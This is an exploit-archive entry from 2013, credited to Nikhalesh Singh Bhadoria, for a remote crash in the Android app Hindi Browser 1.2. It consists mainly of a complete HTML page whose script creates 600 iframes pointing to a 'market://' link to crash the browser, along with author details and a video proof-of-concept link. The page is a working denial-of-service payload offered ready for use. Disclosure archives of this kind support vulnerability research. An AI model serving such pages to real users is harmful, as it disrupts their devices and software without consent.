Hindi Browser 1.2 Denial Of Service



EKU-ID: 3257 CVE: OSVDB-ID:
Author: Nikhalesh Singh Bhadoria Published: 2013-06-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Hindi Browser Remote Crash Exploit
# Date: 06/01/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link: https://play.google.com/store/apps/details?id=com.hb&feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5oYiJd
# Version: 1.2
# Category:Remote 
# Tested On : Android 4.1.2
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Poc :-http://www.youtube.com/watch?v=nX0IveByeiw&feature=youtu.be

Code :-
#########################################
<html>
<body>
 
<script type="text/javascript">
 
var m_frame = "";
 
for(var i = 0; i < 600; i++)
{
 
  m_frame = document.createElement("iframe");
  m_frame.setAttribute("src", "market://a");
 
  document.body.appendChild(m_frame);
}
</script>
 
</body>
</html>

###########################################
Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com